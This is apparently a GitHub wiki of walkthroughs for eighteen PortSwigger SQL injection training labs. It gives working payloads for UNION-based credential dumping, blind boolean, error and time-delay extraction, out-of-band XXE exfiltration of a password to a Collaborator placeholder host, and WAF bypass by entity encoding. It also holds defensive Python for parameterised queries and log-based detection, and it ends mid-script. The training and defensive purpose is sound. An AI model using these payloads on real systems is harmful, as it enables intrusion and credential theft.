SQL Injection - NANDITHA90/PortSwigger-LABS GitHub Wiki

LAB - 1

SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

  • To solve the lab, perform an SQL injection attack that causes the application to display one or more unreleased products.

(a) Clothing, shoes and accessories Page :

image

(b) Append to the category value in the URL :

  • '+OR+1=1--

image


LAB - 2

SQL injection vulnerability allowing login bypass

  • To solve the lab, perform an SQL injection attack that logs in to the application as the administrator user.

(a) Log-IN :

  • UserName : administrator

image

(b) Logs in to the application as the administrator user.

image
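Both labs above work because the category filter and the login check are built by concatenating user input into the SQL text. The following Python example is added here and is not part of the lab or of PortSwigger's code; it uses a constructed in-memory SQLite schema with constructed product names and credentials. It runs the page's own `' OR 1=1--` payload against the concatenated query and against its parameterised replacement, so the difference in behaviour can be seen directly.

```python
import sqlite3

# Constructed in-memory schema standing in for the lab's product catalogue and
# user store; the real lab schema is not shown on this page.
SCHEMA = """
CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO products VALUES ('Scarf', 'Accessories', 1),
                            ('Hidden Gadget', 'Tech Gifts', 0),
                            ('Mug', 'Gifts', 1);
INSERT INTO users VALUES ('administrator', 'constructed-admin-password'),
                         ('wiener', 'constructed-wiener-password');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def products_vulnerable(conn, category):
    # LAB 1 pattern: the category is spliced into the SQL text, so a closing
    # quote followed by OR 1=1-- makes the WHERE clause always true and
    # comments out the released = 1 restriction that hides unreleased stock.
    sql = ("SELECT name FROM products WHERE category = '" + category
           + "' AND released = 1")
    return [row[0] for row in conn.execute(sql)]


def products_safe(conn, category):
    # Fix: a bound parameter reaches the engine as a value, never as SQL, so
    # the same input is just a category name that matches nothing.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]


def login_vulnerable(conn, username, password):
    # LAB 2 pattern: username and password are concatenated into the query, so
    # the same tautology in the username makes the password check unreachable.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Fix: both values are bound; the query structure cannot be altered.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = connect()
    payload = "Gifts' OR 1=1--"
    print("vulnerable filter:   ", products_vulnerable(db, payload))
    print("parameterised filter:", products_safe(db, payload))
    print("vulnerable login:    ", login_vulnerable(db, "administrator' OR 1=1--", ""))
    print("parameterised login: ", login_safe(db, "administrator' OR 1=1--", ""))
```

The concatenated filter returns every product including the unreleased one, and the concatenated login returns administrator with an empty password; the parameterised versions return nothing for the same inputs while still working for a genuine category or a correct username/password pair.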


LAB - 3

SQL injection attack, querying the database type and version on Oracle

  • Using a UNION attack to retrieve the results from an injected query.

  • To solve the lab, display the database version string.

(a) First we check the number of columns by injecting NULL values; on Oracle every SELECT needs a FROM clause, so we select FROM dual.

  • category=Tech+Gifts'+union+select+null,null+from+dual--

image

(b) Then we select banner FROM v$version to retrieve the Oracle database version info

  • category=Tech Gifts'+union+select+null,banner+from+v$version--

image

  • Trying for Another Category

image


LAB - 4

SQL injection attack, querying the database type and version on MySQL and Microsoft

  • Using a UNION attack to retrieve the results from an injected query.

  • To solve the lab, display the database version string.

(a) First we check the number of columns and find a column that accepts string data :

  • category=Lifestyle'+union+select+null,'a'--

image

(b) Then we select @@version, which returns the version string on both MySQL and Microsoft SQL Server, and end the query with %23 (the URL encoding of #), the MySQL comment sequence.

  • category=Lifestyle'+union+select+null,@@version%23

image


LAB - 5

SQL injection attack, listing the database contents on non-Oracle databases

  • About
    • The results from the query are returned in the application's response, so we are using a UNION attack to retrieve data from other tables.
    • The application has a login function, and the database contains a table that holds usernames and passwords.
    • We are now determining the name of this table and the columns it contains, then retrieving the contents of the table to obtain the username and password of all users.
    • To solve the lab, we are logging in as the administrator user.

(a) First we list the tables by querying information_schema.tables

  • category=Gifts'+union+select+table_name,+null+from+information_schema.tables--

image

(b) Now we select column names from the table users_ebdodv

  • category=Gifts'+union+select+column_name,+null+from+information_schema.columns+where+table_name='users_ebdodv'--

image

(c) Now we get the Credentials

image

image

(d) Now we retrieve all user credentials using the table and column names found above

  • category=Pets'+union+select+username_ixiyhx,+password_eocpkk+from+users_ebdodv--
  • We got the administrator password and logged in to solve the lab.

image

(e) Now we try to log in as administrator with the retrieved password

image

  • Logged in successfully as an administrator :

image


LAB - 6

SQL injection attack, listing the database contents on Oracle

  • About
    • The results from the query are returned in the application's response, so we are using a UNION attack to retrieve data from other tables.
    • The application has a login function, and the database contains a table that holds usernames and passwords.
    • We are determining the name of this table and the columns it contains, then retrieving the contents of the table to obtain the username and password of all users.
    • To solve the lab, logging in as the administrator user.

(a) First we list the tables

  • category=Pets'+union+select+table_name,null+from+all_tables--

image

(b) Then we list the columns of the users table

  • category=Pets%27+union+select+column_name,null+from+all_tab_columns+where+table_name=%27USERS_PJXZUN%27--

  • Now we get the Credentials

image image

(c) Now we retrieve all user credentials using the table and column names found above

  • category=Pets'+union+select+USERNAME_QEEVWD,+PASSWORD_EPOMRV+from+USERS_PJXZUN--
  • We got the user Credentials

image

(d) Now we try to log in as administrator with the retrieved password

image

  • Logged in successfully as an administrator :

image

  • Logging in as carlos with the retrieved credentials
    • Successfully logged in as carlos.

image

image


LAB - 7

SQL injection UNION attack, determining the number of columns returned by the query

  • About

    • This lab contains a SQL injection vulnerability in the product category filter.
    • Using a UNION attack to retrieve the results from an injected query.
    • To solve the lab, display the database version string.
  • The first step of such an attack is to determine the number of columns that are being returned by the query.

  • To solve the lab, We are determining the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.

(a) Category - LIFESTYLE :

image

(b) Using one or two NULL values gives an Internal Server Error, because the number of NULLs does not match the number of columns returned by the query.

  • category=Lifestyle'+union+select+null,null,...<one NULL per column>--
  • category=Lifestyle'+union+select+null--

image

(c) Using three NULLs matches the number of columns :

  • category=Lifestyle'+union+select+null,null,null--

image


LAB - 8

SQL injection UNION attack, finding a column containing text

  • About
    • The results from the query are returned in the application's response, so we are using a UNION attack to retrieve data from other tables.

    • To construct such an attack, we first need to determine the number of columns returned by the query.

    • The lab will provide a random value that we need to make appear within the query results.

    • To solve the lab, we are performing a SQL injection UNION attack that returns an additional row containing the value provided.

    • This technique helps us to determine which columns are compatible with string data.

    • Make the database retrieve the string: y4d3eF

(a) First we determine the number of columns returned by the category query, using NULL values.

  • category=Pets'+union+select+null,null,null--

image

(b) Then we find which column holds string data by replacing NULL with 'a' in each column in turn

  • 1st : category=Pets'+union+select+'a',null,null--
    • Internal Server Error

image

  • 2nd : category=Pets'+union+select+null,'a',null--
    • String

image

  • 3rd : category=Pets'+union+select+null,null,'a'--
    • Internal Server Error

image

  • From the three attempts above, only the 2nd column accepts string data. So we replace 'a' with the required string : y4d3eF

image


LAB - 9

SQL injection UNION attack, retrieving data from other tables

  • About
    • The results from the query are returned in the application's response, so we are using a UNION attack to retrieve data from other tables.

    • The database contains a different table called users, with columns called username and password.

    • To solve the lab, we are performing a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

(a) First we confirm that the query returns two columns and that both accept string data, by injecting NULL values and then 'a' in both positions.

  • category=Pets'+union+select+'a','a'--

image

(b) Then we select username and password from the users table

  • category=Pets'+union+select+username,password+from+users--

image

(c) Retrieving the user credentials.

image

(d) Logging in with the Credentials

  • As Administrator

image image

  • As Wiener

image image

  • As Carlos

image image

Just a Check :

  • Trying with invalid credentials.
    • Invalid credentials do not log in.

image


LAB - 10

SQL injection UNION attack, retrieving multiple values in a single column

  • About
    • The results from the query are returned in the application's response, so we are using a UNION attack to retrieve data from other tables.

    • The database contains a different table called users, with columns called username and password.

    • To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

image

(a) First we have to check the number of columns :

  • category=Pets'+union+select+null,null--

image

(b) Then we check which column holds string data :

  • category=Pets'+union+select+null,'a'--

image

(c) Then we retrieve username and password as one concatenated string in the string column

  • category=Pets'+union+select+null,username||'~'||password+from+users--
  • User credentials with ~ separator

image

(d) Logging in with the provided credentials

  • logged in

image image


LAB - 11

Blind SQL injection with conditional responses

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.
    • The database contains a different table called users, with columns called username and password.
    • We need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
    • To solve the lab, log in as the administrator user.
  • Steps For Burp Suite

    • Open Burp Suite Community Edition

    • Go to PROXY Tab

    • Select : OPEN BROWSER

    • Now, paste the lab URL into the opened browser

    • Go Back to Burp Suite, Turn ON INTERCEPT

    • Go to Browser and Select : MY ACCOUNT

    • Go back to Burp Suite and keep forwarding the intercepted requests until you see one carrying the TrackingId cookie

    • Once you get the ID, Right Click and Select : SEND TO REPEATER

  • PROXY TAB

image

  • REPEATER TAB

image

(a) Perform SQL injection in place of Cookie TrackingID and Search for Welcome Back Message

  • Type TrackingId=xyz' AND '1'='1 and Click on SEND

  • Welcome Back Message appears...

image

image

  • Type TrackingId=xyz' AND '1'='2 and Click on SEND

  • Welcome Back Message Disappears...

image

(b) Check whether there is a TABLE named USERS

  • Type TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a and Click on SEND

  • Welcome Back Message appears... USERS Table Exists

image

(c) Check whether there is a USER called ADMINISTRATOR

  • Type TrackingId=xyz'+union+select+'a'+from+users+where+username='administrator'-- and Click on SEND

  • Welcome Back Message appears... USER called ADMINISTRATOR Exists

image

(d) Determining how many characters are in the password of the administrator user

  • Type TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a and Click on SEND

  • TrackingId=x'+union+select+'a'+from+users+where+username='administrator'+and+length(password)>1--

    TrackingId=x'+union+select+'a'+from+users+where+username='administrator'+and+length(password)>2--

    TrackingId=x'+union+select+'a'+from+users+where+username='administrator'+and+length(password)>3--

    . . .

  • 19th Trial

    • Welcome back is still appearing

image

  • 20th Trial

    • The WELCOME BACK message Disappears

    • With LENGTH(password)>19 the message still appears and with LENGTH(password)>20 it disappears, so the password is exactly 20 characters long.

image

(e) Send to INTRUDER

  • Mark the payload position with §

image

(f) Check for Password length by running Numbers Payload

image

(g) Grep-Match : Add - Welcome Back

image

(h) Start ATTACK

image

(i) Guessing Administrator Password

  • Add the following

image

1st Character of the PASSWORD : z

image

  • Change the Code to SUBSTRING(password,2,1) for the 2nd Character

image

2nd Character of the PASSWORD : k

image

3rd Character of the PASSWORD : 0

image

4th Character of the PASSWORD : i

image

5th Character of the PASSWORD : 1

image

6th Character of the PASSWORD : d

image

7th Character of the PASSWORD : r

image

8th Character of the PASSWORD : q

image

9th Character of the PASSWORD : x

image

10th Character of the PASSWORD : o

image

11th Character of the PASSWORD : w

image

12th Character of the PASSWORD : n

image

13th Character of the PASSWORD : 3

image

14th Character of the PASSWORD : s

image

15th Character of the PASSWORD : t

image

16th Character of the PASSWORD : u

image

17th Character of the PASSWORD : a

image

18th Character of the PASSWORD : 8

image

19th Character of the PASSWORD : 3

image

20th Character of the PASSWORD : 2

image

  • PASSWORD FORMED : zk0i1drqxown3stua832

image

image


LAB - 12

Blind SQL injection with conditional errors

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows.
    • If the SQL query causes an error, then the application returns a custom error message.
    • The database contains a different table called users, with columns called username and password.
    • We are exploiting the blind SQL injection vulnerability to find out the password of the administrator user.
    • To solve the lab, log in as the administrator user.
  • PROXY TAB

image

  • REPEATER TAB

image

(a) Appending a single quotation mark to the TrackingID

  • TrackingId=xyz'

Internal Server Error

image

(b) Appending two single quotation marks to the TrackingID

  • TrackingId=xyz''

HTTP/2 200 OK

image

(c) Appending '||(SELECT '')||' to the TrackingID

image

(d) Appending '||(SELECT '' FROM dual)||' to the TrackingID

image

As we no longer receive an error, this indicates that the target is probably using an Oracle database, which requires all SELECT statements to explicitly specify a table name.

(e) Try querying a non-existent table name:

This time, an error is returned. This behavior strongly suggests that your injection is being processed as a SQL query by the back-end.

image

(f) Try querying an existent table name:

As this query does not return an error, we can infer that this table does exist.

Note that the WHERE ROWNUM = 1 condition is important here to prevent the query from returning more than one row, which would break our concatenation.

image

(g) You can also exploit this behavior to test conditions.

Error Message is Received

image

(h) You can trigger an error conditionally on the truth of a specific condition.

Error Disappears

The CASE statement tests a condition and evaluates to one expression if the condition is true, and another expression if the condition is false. The former expression contains a divide-by-zero, which causes an error. In this case, the two payloads test the conditions 1=1 and 1=2, and an error is received when the condition is true.

image

(i) Testing whether specific entries exist in a table

  • TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
  • User : Administrator

Verifying that the condition is true (the error is received), confirming that there is a user called administrator.

image

(j) Characters in the Password of administrator user

  • TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'

We get the error, so the password is longer than 1 character.

image

Trying LENGTH(password)>19 :

image

Trying LENGTH(password)>20 :

When the condition stops being true (i.e. when the error disappears), we have determined the length of the password, which is in fact 20 characters long.

image

(k) Length via Intruder

  • Payload Positions

image

  • Payload Configurations

image

  • Starting Attack

Here we can see it is 20 in length.

image

(l) Finding Password

  • TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

image

  • Payload Configuration

Add a-z and 0-9

image

  • Start Attack to find all the Characters

1st Character : l

image

2nd Character : 5

image

3rd Character : 9

image

4th Character : c

image

5th Character : 7

image

6th Character : y

image

7th Character : h

image

8th Character : 4

image

9th Character : w

image

10th Character : t

image

11th Character : o

image

12th Character : 5

image

13th Character : l

image

14th Character : 3

image

15th Character : 7

image

16th Character : s

image

17th Character : v

image

18th Character : x

image

19th Character : 0

image

20th Character : 6

image

  • PASSWORD FORMED : l59c7yh4wto5l37svx06

image

image


LAB - 13

Visible error-based SQL injection

  • About

    • The application uses a tracking cookie for analytics and performs a SQL query containing the value of the submitted cookie.
    • The results of the SQL query are not returned.
    • The database contains a different table called users, with columns called username and password.
    • To solve the lab, we are finding a way to leak the password for the administrator user, then log in to their account.

(a) TrackingID

  • Proxy > HTTP history tab and find a GET / request that contains a TrackingId cookie.

image

(b) Adapt the query to include a generic SELECT subquery and cast the returned value to an int data type :

Send the request.

Observe that we now get a different error saying that an AND condition must be a Boolean expression.

image

(c) Modify the condition accordingly

Send the request. Confirm that you no longer receive an error. This suggests that this is a valid query again.

image

(d) Adapt your generic SELECT statement so that it retrieves usernames from the database :

Observe that you receive the initial error message again.

Notice that your query now appears to be truncated due to a character limit. As a result, the comment characters you added to fix up the query aren't included.

image

(e) Delete the original value of the TrackingId cookie to free up some additional characters. Resend the request.

Notice that you receive a new error message, which appears to be generated by the database.

This suggests that the query was run properly, but you're still getting an error because it unexpectedly returned more than one row.

image

(f) Modify the query to return only one row:

  • TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--

ERROR: invalid input syntax for type integer: "administrator"

image

(g) Now that you know that the administrator is the first user in the table, modify the query once again to leak their password:

TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--

image

  • Password retrieved : ntvpfj49vdtgstvx6x3f

(h) Logging In

image

image


LAB - 14

Blind SQL injection with time delays

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error.
    • However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
    • To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.

(a) Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie.

  • At Proxy

image

  • After sending to the Intruder

image

(b) Modify the TrackingId cookie, changing it to:

  • TrackingId=x'||pg_sleep(10)--

Send it from Intruder to Repeater, then click Send.

The response takes 10 seconds to arrive, which is the delay caused by pg_sleep(10).

image

SOLVED

image


LAB - 15

Blind SQL injection with time delays and information retrieval

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error.
    • However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
    • The database contains a different table called users, with columns called username and password.
    • You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
    • To solve the lab, log in as the administrator user.

(a) TrackingID

image

(b) Modifying the request containing TrackingID (true condition)

  • TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--

We will observe that we got the Response after 10 Seconds (It had Time Delay)

image

(b) Modifying the request containing TrackingID (false condition)

  • TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--

We will observe that we got the Response immediately (It had NO Time Delay)

image

A single Boolean condition can change the Response.

(c) Confirming whether there's a user called administrator

  • TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

If it's True, it takes 10 Seconds to Respond.

image

(d) Determining the Characters in the Password

  • TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
  • If the condition is true, the response takes 10 seconds to arrive

image

  • Keep increasing the length until the condition stops holding

TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

. . .

During the 20th Trial, we get the Response Immediately.

  • TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>20)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

image

  • So, that means the Length of the password is 20 Characters.

(e) Burp Intruder

image

  • Payload settings

image

  • Starting the Attack

We will observe that there will be 10 seconds delay for each outcome until 20th iteration, after the 20th iteration we will get immediate response.

image

(f) Change the TrackingID

  • TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

  • The correct character for each position is the one whose request takes 10 seconds to respond (all other characters respond immediately)

1st Character : 4

image

2nd Character : b

image

3rd Character : i

image

4th Character : 4

image

5th Character : z

image

6th Character : m

image

7th Character : 9

image

8th Character : 2

image

9th Character : j

image

10th Character : e

image

11th Character : z

image

12th Character : y

image

13th Character : j

image

14th Character : z

image

15th Character : s

image

16th Character : s

image

17th Character : y

image

18th Character : e

image

19th Character : 3

image

20th Character : e

image

  • PASSWORD FORMED : 4bi4zm92jezyjzssye3e

(g) Logging In

image

SOLVED

image
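The enumeration in labs 11, 12, 14 and 15 has a behavioural footprint that does not depend on the payload text: one client sends a burst of requests to the same page, each with a different tracking cookie, and exactly one request per position answers slowly (time-based) or with a server error (conditional errors). The following Python detector is an added example, not code from the lab or from PortSwigger; the request records are constructed, and the cookie values are placeholders standing in for the per-character probes shown above, since the detector only needs to see that they change from request to request.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Each record is (timestamp, client_ip, path, tracking_id, status, response_ms).
# Every record below is constructed for this example.


def build_sample_records():
    t0 = datetime(2024, 1, 1, 12, 0, 0)
    records = []
    # Ordinary visitor: a handful of page views with one stable cookie.
    for i in range(5):
        records.append((t0 + timedelta(seconds=30 * i), "10.0.0.5", "/",
                        "abc123", 200, 120))
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    # Time-based enumeration (LAB 15 shape): 36 requests in 36 seconds, a new
    # cookie each time, exactly one of which stalls for about 10 seconds.
    for i, ch in enumerate(alphabet):
        ms = 10050 if ch == "4" else 130
        records.append((t0 + timedelta(seconds=i), "10.0.0.9", "/",
                        "delay-probe-" + ch, 200, ms))
    # Conditional-error enumeration (LAB 12 shape): the same burst, but the
    # hit shows up as a single server error instead of a delay.
    for i, ch in enumerate(alphabet):
        status = 500 if ch == "l" else 200
        records.append((t0 + timedelta(seconds=i), "10.0.0.7", "/",
                        "error-probe-" + ch, status, 110))
    return records


def detect_enumeration(records, window=timedelta(seconds=60),
                       min_distinct=10, slow_ms=5000):
    """Flag clients that rotate many distinct tracking cookies inside one
    time window; report slow and 5xx responses alongside as supporting
    evidence for time-based or error-based probing."""
    by_client = defaultdict(list)
    for rec in records:
        by_client[rec[1]].append(rec)
    alerts = []
    for ip, reqs in sorted(by_client.items()):
        reqs.sort(key=lambda r: r[0])
        max_distinct, end = 0, 0
        for start in range(len(reqs)):
            # Slide the window end forward while it stays within `window`
            # of the current start request.
            while end < len(reqs) and reqs[end][0] - reqs[start][0] <= window:
                end += 1
            distinct = len({r[3] for r in reqs[start:end]})
            max_distinct = max(max_distinct, distinct)
        if max_distinct >= min_distinct:
            alerts.append({
                "client": ip,
                "distinct_cookies": max_distinct,
                "slow_responses": sum(1 for r in reqs if r[5] >= slow_ms),
                "server_errors": sum(1 for r in reqs if 500 <= r[4] < 600),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_enumeration(build_sample_records()):
        print(alert)
```

The thresholds (10 distinct cookies per 60 seconds, 5 seconds as "slow") are assumptions for the example; a real deployment would tune them against its own traffic. The point is that a tracking cookie is supposed to be stable per visitor, so a client that changes it on every request is already anomalous before any payload is inspected.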


LAB - 16

Blind SQL injection with out-of-band interaction

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The SQL query is executed asynchronously and has no effect on the application's response.
    • However, you can trigger out-of-band interactions with an external domain.
    • To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.

(a) TrackingID

image

(b) Modifying TrackingID

  • TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

image

Right-click and select Insert Collaborator payload to insert a Burp Collaborator subdomain where indicated in the modified TrackingId cookie.

image

image

SOLVED

image


LAB - 17

Blind SQL injection with out-of-band data exfiltration

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The SQL query is executed asynchronously and has no effect on the application's response.
    • However, you can trigger out-of-band interactions with an external domain.
    • The database contains a different table called users, with columns called username and password.
    • You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
    • To solve the lab, log in as the administrator user.

(a) TrackingID

image

(b) Modify the TrackingID

  • Changing it to a payload that will leak the administrator's password in an interaction with the Collaborator server.

  • For example, you can combine SQL injection with basic XXE techniques.

  • TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

image

Right-click and select Insert Collaborator payload to insert a Burp Collaborator subdomain where indicated in the modified TrackingId cookie.

image

image

  • Go to the Collaborator tab, and click Poll now.

image

  • If you don't see any interactions listed, wait a few seconds and try again, since the server-side query is executed asynchronously.

  • You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.

image

  • The password of the administrator user should appear in the subdomain of the interaction, and you can view this within the Collaborator tab.

  • For DNS interactions, the full domain name that was looked up is shown in the Description tab.

image

  • For HTTP interactions, the full domain name is shown in the Host header in the Request to Collaborator tab.

image

  • In the browser, click My account to open the login page.

  • Use the password to log in as the administrator user.

image

image

image

SOLVED


LAB - 18

SQL Injection with filter bypass via XML encoding

  • About

    • This lab contains a SQL injection vulnerability in its stock check feature.
    • The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables.
    • The database contains a users table, which contains the usernames and passwords of registered users.
    • To solve the lab, perform a SQL injection attack to retrieve the admin user's credentials, then log in to their account.

(a) Open Burp Suite

  • Follow the Steps :

    • Open Burp Suite
    • Open Browser
    • Paste the link in the default browser opened
    • In the Default Browser opened, go to the Product (Select the View Details)
    • Turn ON : INTERCEPT
    • Click : CHECK STOCK

Observe that the stock check feature sends the productId and storeId to the application in XML format.

image

  • Send the POST /product/stock request to Burp Repeater.

    • Right Click > Send to Repeater
    • Send

image

(b) Burp Repeater

  • Probe the storeId to see whether your input is evaluated.

  • For example, try replacing the ID with mathematical expressions that evaluate to other potential IDs

  • <storeId>1+1</storeId>

image

Observe that the input appears to be evaluated by the application, returning the stock for different stores.

(c) Determining the number of columns returned by the original query

  • By appending a UNION SELECT statement to the original store ID

    • <storeId>1 UNION SELECT NULL</storeId>

image

Observe that your request has been blocked due to being flagged as a potential attack.

(d) Obfuscating payload using XML entities

  • Highlight your Input > Right-click > Extensions > Hackvertor > Encode > dec_entities/hex_entities.

image

  • <storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>

image

(e) Logging In to their Accounts

username ~ password

  • Credentials :

    • carlos ~ vg5ziyj5vgq59mpjtq2j

    • administrator ~ rdxwmpheiisakm0evnkd

    • wiener ~ y4gbezbjt0fngtgxt3mi

  • Administrator

image

image
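Lab 18 shows why signature matching on the raw request is not enough: the same UNION SELECT that was blocked in plain text passed once it was hex-entity encoded. The following Python example is added here and is not the lab's code or any WAF product's; it normalises each request (repeated URL decoding, then XML/HTML entity decoding, then case and whitespace) before matching the payload shapes seen across the labs on this page, such as UNION SELECT, information_schema and v$version probes, boolean subqueries, CASE WHEN with 1/0, pg_sleep, stacked queries and EXTRACTVALUE(xmltype(...)). The log format and every log line are constructed for the example.

```python
import re
from collections import Counter
from html import unescape
from urllib.parse import unquote_plus

# Constructed log format (not a real server's): tab-separated
# client_ip, method, path, status, Cookie header value, request body.
SAMPLE_LOG = [
    "10.0.0.5\tGET\t/filter?category=Gifts\t200\tTrackingId=abc123\t-",
    "10.0.0.5\tGET\t/filter?category=Pets'+union+select+username,password+from+users--\t200\tTrackingId=abc123\t-",
    "10.0.0.7\tGET\t/\t200\tTrackingId=xyz'+AND+(SELECT+'a'+FROM+users+LIMIT+1)='a\t-",
    "10.0.0.7\tGET\t/\t500\tTrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'\t-",
    "10.0.0.9\tGET\t/\t200\tTrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--\t-",
    "10.0.0.11\tGET\t/\t200\tTrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d\"1.0\"%3f>'),'/l')+FROM+dual--\t-",
    "10.0.0.13\tPOST\t/product/stock\t200\tsession=constructed\t<?xml version=\"1.0\"?><stockCheck><productId>1</productId><storeId>&#x31;&#x20;&#x55;&#x4e;&#x49;&#x4f;&#x4e;&#x20;&#x53;&#x45;&#x4c;&#x45;&#x43;&#x54;&#x20;&#x4e;&#x55;&#x4c;&#x4c;</storeId></stockCheck>",
    "10.0.0.13\tPOST\t/product/stock\t200\tsession=constructed\t<?xml version=\"1.0\"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>",
    "10.0.0.5\tGET\t/filter?category=Gifts'+union+select+table_name,+null+from+information_schema.tables--\t200\tTrackingId=abc123\t-",
    "10.0.0.5\tGET\t/filter?category=Gifts'+OR+1=1--\t200\tTrackingId=abc123\t-",
]

# Rule names and the shape each one looks for, all taken from the labs above.
RULES = [
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_probe", re.compile(r"information_schema\.|\ball_tab(les|_columns)\b|v\$version|@@version")),
    ("subquery", re.compile(r"\(\s*select\b")),
    ("conditional_error", re.compile(r"\bcase\s+when\b.*\b1\s*/\s*0\b")),
    ("time_delay", re.compile(r"\bpg_sleep\s*\(")),
    ("stacked_query", re.compile(r";\s*(select|insert|update|delete|drop)\b")),
    ("oob_xxe", re.compile(r"extractvalue\s*\(\s*xmltype\s*\(")),
    ("tautology", re.compile(r"'\s*or\s+'?\d+'?\s*=\s*'?\d+")),
]


def normalize(text):
    """Undo the encodings an attacker can layer on before matching: repeated
    URL decoding (bounded), then XML/HTML entities, then case and whitespace."""
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = unescape(text)
    return re.sub(r"\s+", " ", text).lower()


def scan_line(line):
    """Return the sorted rule names that fire on one log line."""
    _ip, _method, path, _status, cookie, body = line.split("\t")
    haystack = normalize(" ".join((path, cookie, body)))
    return sorted(name for name, rx in RULES if rx.search(haystack))


def scan_log(lines):
    hits = []
    for line in lines:
        rules = scan_line(line)
        if rules:
            ip, _method, path, status, _cookie, _body = line.split("\t")
            hits.append({"client": ip, "path": path,
                         "status": int(status), "rules": rules})
    return hits


def per_client(hits):
    """How many flagged requests each client sent; useful for prioritising."""
    return Counter(h["client"] for h in hits)


if __name__ == "__main__":
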